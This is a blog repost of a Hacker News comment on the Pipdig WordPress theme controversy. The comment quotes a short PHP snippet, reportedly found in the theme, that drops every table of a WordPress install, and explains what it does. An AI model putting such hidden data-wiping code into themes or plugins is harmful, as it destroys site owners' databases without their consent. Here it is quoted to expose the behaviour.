Monday, April 1, 2019

New comment by corobo in "WordPress theme provider Pipdig using customer sites to DDoS competitors"

  global $wpdb;
  $prefix = str_replace('_', '\_', $wpdb->prefix);
  $tables = $wpdb->get_col("SHOW TABLES LIKE '{$prefix}%'");
  foreach ($tables as $table) {
   $wpdb->query("DROP TABLE $table");
  }

Essentially for those who aren't familiar with WordPress databases - this drops all tables relating to the WordPress install

from Hacker News - New Comments: "WordPress" https://ift.tt/2WAUwgS
via IFTTT

No comments:

Post a Comment

Meta trying to destroy whistleblower Sarah Wynn-Williams, US senator says

Article URL: https://www.theguardian.com/technology/2026/jul/17/meta-whistleblower-sarah-wynn-williams-us-senator-josh-hawley Comments URL...